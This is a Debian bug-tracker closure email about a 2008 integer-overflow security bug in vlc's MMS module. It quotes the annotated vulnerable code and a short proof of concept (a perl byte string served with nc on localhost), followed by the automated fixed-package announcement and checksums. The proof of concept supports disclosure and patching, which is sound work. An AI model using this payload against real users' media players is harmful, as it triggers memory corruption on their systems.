Your message dated Mon, 25 Aug 2008 12:02:29 +0000 with message-id <[EMAIL PROTECTED]> and subject line Bug#496265: fixed in vlc 0.8.6.h-4 has caused the Debian Bug report #496265, regarding vlc: buffer overflow in mms handling to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 496265: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496265 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems
--- Begin Message ---Package: vlc Version: 0.8.6.i-1 Severity: grave Tags: security Hi, the following security issue was published for vlc static int mms_ReceiveCommand( access_t *p_access ) { access_sys_t *p_sys = p_access->p_sys; for( ;; ) { int i_used; int i_status; if( NetFillBuffer( p_access ) < 0 ) { msg_Warn( p_access, "cannot fill buffer" ); return VLC_EGENERIC; } if( p_sys->i_buffer_tcp > 0 ) { [1] i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp, p_sys->i_buffer_tcp, &i_used ); [2] if( i_used < MMS_BUFFER_SIZE ) { [3] memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used, MMS_BUFFER_SIZE - i_used ); //BUG! i_used overflow (...) [1] - function that sets i_used to negative value, see below [2] - i_used is signed, so predicate is true [3] - actual overflow, we have good control over what is written static int mms_ParseCommand( access_t *p_access, uint8_t *p_data, int i_data, int *pi_used ) (...) i_length = GetDWLE( p_data + 8 ) + 16; (...) if( i_length > p_sys->i_cmd ) { msg_Warn( p_access, "truncated command (missing %d bytes)", i_length - i_data ); p_sys->i_command = 0; return -1; } [1] else if( i_length < p_sys->i_cmd ) { p_sys->i_cmd = i_length; [2] *pi_used = i_length; } (...) [1] - predicate is true [2] - sets i_used from mms_ReceiveCommand - - Proof of concept - on localhost: perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot nc -l -v -p 1755 < headshot open this url in VLC: mmst://127.0.0.1/ I can confirm this issue exists. Please see http://www.orange-bat.com/adv/2008/adv.08.24.txt for the original advisory. I'll follow up on this bug report with a CVE id soon. Kind regards Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted.
pgpvEw4tqEiz3.pgp
Description: PGP signature
--- End Message ---
--- Begin Message ---Source: vlc Source-Version: 0.8.6.h-4 We believe that the bug you reported is fixed in the latest version of vlc, which is due to be installed in the Debian FTP archive: libvlc0-dev_0.8.6.h-4_i386.deb to pool/main/v/vlc/libvlc0-dev_0.8.6.h-4_i386.deb libvlc0_0.8.6.h-4_i386.deb to pool/main/v/vlc/libvlc0_0.8.6.h-4_i386.deb mozilla-plugin-vlc_0.8.6.h-4_i386.deb to pool/main/v/vlc/mozilla-plugin-vlc_0.8.6.h-4_i386.deb vlc-nox_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc-nox_0.8.6.h-4_i386.deb vlc-plugin-arts_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc-plugin-arts_0.8.6.h-4_i386.deb vlc-plugin-esd_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc-plugin-esd_0.8.6.h-4_i386.deb vlc-plugin-ggi_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc-plugin-ggi_0.8.6.h-4_i386.deb vlc-plugin-glide_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc-plugin-glide_0.8.6.h-4_i386.deb vlc-plugin-jack_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc-plugin-jack_0.8.6.h-4_i386.deb vlc-plugin-sdl_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc-plugin-sdl_0.8.6.h-4_i386.deb vlc-plugin-svgalib_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc-plugin-svgalib_0.8.6.h-4_i386.deb vlc_0.8.6.h-4.diff.gz to pool/main/v/vlc/vlc_0.8.6.h-4.diff.gz vlc_0.8.6.h-4.dsc to pool/main/v/vlc/vlc_0.8.6.h-4.dsc vlc_0.8.6.h-4_i386.deb to pool/main/v/vlc/vlc_0.8.6.h-4_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Christophe Mutricy <[EMAIL PROTECTED]> (supplier of updated vlc package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Format: 1.8 Date: Mon, 25 Aug 2008 01:07:27 +0100 Source: vlc Binary: vlc vlc-nox libvlc0 libvlc0-dev vlc-plugin-esd vlc-plugin-sdl vlc-plugin-ggi vlc-plugin-glide vlc-plugin-arts mozilla-plugin-vlc vlc-plugin-svgalib vlc-plugin-jack Architecture: source i386 Version: 0.8.6.h-4 Distribution: unstable Urgency: high Maintainer: Debian multimedia packages maintainers <[EMAIL PROTECTED]> Changed-By: Christophe Mutricy <[EMAIL PROTECTED]> Description: libvlc0 - multimedia player and streamer library libvlc0-dev - development files for VLC mozilla-plugin-vlc - multimedia plugin for web browsers based on VLC vlc - multimedia player and streamer vlc-nox - multimedia player and streamer (without X support) vlc-plugin-arts - aRts audio output plugin for VLC vlc-plugin-esd - Esound audio output plugin for VLC vlc-plugin-ggi - GGI video output plugin for VLC vlc-plugin-glide - Glide video output plugin for VLC vlc-plugin-jack - Jack audio plugins for VLC vlc-plugin-sdl - SDL video and audio output plugin for VLC vlc-plugin-svgalib - SVGAlib video output plugin for VLC Closes: 496265 Changes: vlc (0.8.6.h-4) unstable; urgency=high . * Security: Fix integer overflow in mms module (Closes: #496265)(407-mms-overflow.diff taken from upstream) Checksums-Sha1: 87c49e28b30660e3eda99eb9a22754f662a787b1 3078 vlc_0.8.6.h-4.dsc 6f0a359debd01f2ee15983ef4d78f168d58a033e 43520 vlc_0.8.6.h-4.diff.gz 0a7e0dd6df2d3510a65db65023586088a9b3dd1e 1084950 vlc_0.8.6.h-4_i386.deb 8688e42d538b46e37d38e45887d8719e11c87d6c 4977644 vlc-nox_0.8.6.h-4_i386.deb ead99b6a2baaadeb81236641e542c2aaab62325d 462036 libvlc0_0.8.6.h-4_i386.deb 439a814456fbf5096c9f97c6c66215558c068a26 478890 libvlc0-dev_0.8.6.h-4_i386.deb 6b666b8ab68c965216037656a7b30bdaa5e38cd6 5252 vlc-plugin-esd_0.8.6.h-4_i386.deb fe06b921729f38e051400ae35d5918f3105cef83 11108 vlc-plugin-sdl_0.8.6.h-4_i386.deb 5d19f2e57f20b1699325dd8cb69cd818dbf3c2f7 6126 vlc-plugin-ggi_0.8.6.h-4_i386.deb c5f59828cc9acfa10d21bb267ae837d6772a742b 4260 vlc-plugin-glide_0.8.6.h-4_i386.deb d9d5a1cfde7cf7d8a61b3c2069601f7a288000f7 4388 vlc-plugin-arts_0.8.6.h-4_i386.deb cc852b097347e61fd6cc166e173986e12ef50207 36986 mozilla-plugin-vlc_0.8.6.h-4_i386.deb 9c739cd67454ab4be9884f15a26b17ef163db510 4850 vlc-plugin-svgalib_0.8.6.h-4_i386.deb 549f98e975e2aebea09f44fffdc400c0567598e9 5154 vlc-plugin-jack_0.8.6.h-4_i386.deb Checksums-Sha256: 96c216dd41129a47009450be859264369eaa2f7b35530730993ea7e4e32c7ffd 3078 vlc_0.8.6.h-4.dsc 7857bb6d76fdc2719c616264322c9829f18e9264432c185a729abcdd4d7e1869 43520 vlc_0.8.6.h-4.diff.gz 85ce5e74a0e43852d1bdbe4bf5bcda4293724454031c7a11878450181b6b23ef 1084950 vlc_0.8.6.h-4_i386.deb 6bee2dc0c3d29b4ac4dd967d5dd73057d8c4b48e011f50a2e477febed3f6f219 4977644 vlc-nox_0.8.6.h-4_i386.deb b7c22ead5a4624af106cd1759b4adbd2ae7fbbdac2280d9edd422832b7dbc0b7 462036 libvlc0_0.8.6.h-4_i386.deb 8e4b98bc6fcc9c1af10a4b82612a4842f5514efe8e40604c9e373bd91816e1e3 478890 libvlc0-dev_0.8.6.h-4_i386.deb eb67515cb7a3a39d21b8b2b5cb88d3e09f775eb6e4425398029a7556e296deba 5252 vlc-plugin-esd_0.8.6.h-4_i386.deb 53cd1b288e6cc117884c5152db21011b9d6657dfb50612ece48cbdcb876505ea 11108 vlc-plugin-sdl_0.8.6.h-4_i386.deb 16b734da7eec76b86684dc61d0fec44feaa62a782ace70d6f7a2fd0aff760e5f 6126 vlc-plugin-ggi_0.8.6.h-4_i386.deb 223ad03e12fb064ec20c89ca862358ac13071cedc1ba45bbfdfdef8b0f253340 4260 vlc-plugin-glide_0.8.6.h-4_i386.deb 12eabf31634b612269d0b528b9ef0511f1a9df1e92861068463b7d6d0944284b 4388 vlc-plugin-arts_0.8.6.h-4_i386.deb ff8d67da7e3196b5e5e2087e6a48d45b4745fda6b8f7deba7f1bd28518cc261e 36986 mozilla-plugin-vlc_0.8.6.h-4_i386.deb d33445fb15902f23b93218962b9cc30f104c9c25d1e4cf99d625de6e0b59e333 4850 vlc-plugin-svgalib_0.8.6.h-4_i386.deb f79f055bf093e29a9d8de6882f1482be1bd53b4b4cc9cff9fe8b7acb7c869e8c 5154 vlc-plugin-jack_0.8.6.h-4_i386.deb Files: 7ec744af90ad0b5767e10cfd5e809195 3078 graphics optional vlc_0.8.6.h-4.dsc b600267ce45934434e363fc7706acecc 43520 graphics optional vlc_0.8.6.h-4.diff.gz 72446cf1099c82e3f2f837c139345f61 1084950 graphics optional vlc_0.8.6.h-4_i386.deb cbedfff946d9ddf9d7f2bbe4009a1f14 4977644 net optional vlc-nox_0.8.6.h-4_i386.deb 8763bf84ae4f05c50e5b8433a1388e68 462036 libs optional libvlc0_0.8.6.h-4_i386.deb eb8e3b32c8632e5644d31a4b21cb7b66 478890 libdevel optional libvlc0-dev_0.8.6.h-4_i386.deb 5523f63affba2463fdc44c9b6f566ee7 5252 graphics optional vlc-plugin-esd_0.8.6.h-4_i386.deb 5a42bf695d6929cb1931b97df20d9585 11108 graphics optional vlc-plugin-sdl_0.8.6.h-4_i386.deb 6aa646b57c84cee041a48bd16aa7adb7 6126 graphics optional vlc-plugin-ggi_0.8.6.h-4_i386.deb 58b721b6199edbd9f6d77d32ae689561 4260 graphics optional vlc-plugin-glide_0.8.6.h-4_i386.deb c2e312f012dea07a6cc901a0cfffd2bc 4388 graphics optional vlc-plugin-arts_0.8.6.h-4_i386.deb 57c99fe6433509d484b1d9511f9d82ae 36986 graphics optional mozilla-plugin-vlc_0.8.6.h-4_i386.deb a1fe89726918e5ed7d7a58b47d599609 4850 graphics optional vlc-plugin-svgalib_0.8.6.h-4_i386.deb ae389a014d6da56487d691695077a151 5154 graphics optional vlc-plugin-jack_0.8.6.h-4_i386.deb -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Debian Powered! iEYEARECAAYFAkiynk0ACgkQmAg1RJRTSKSm7ACeLYWR5gz5wxY7YF0Ql5/iK3SD YywAnjMgNxC1/cPzEadaidIevDQoYv58 =NaMd -----END PGP SIGNATURE-----
--- End Message ---
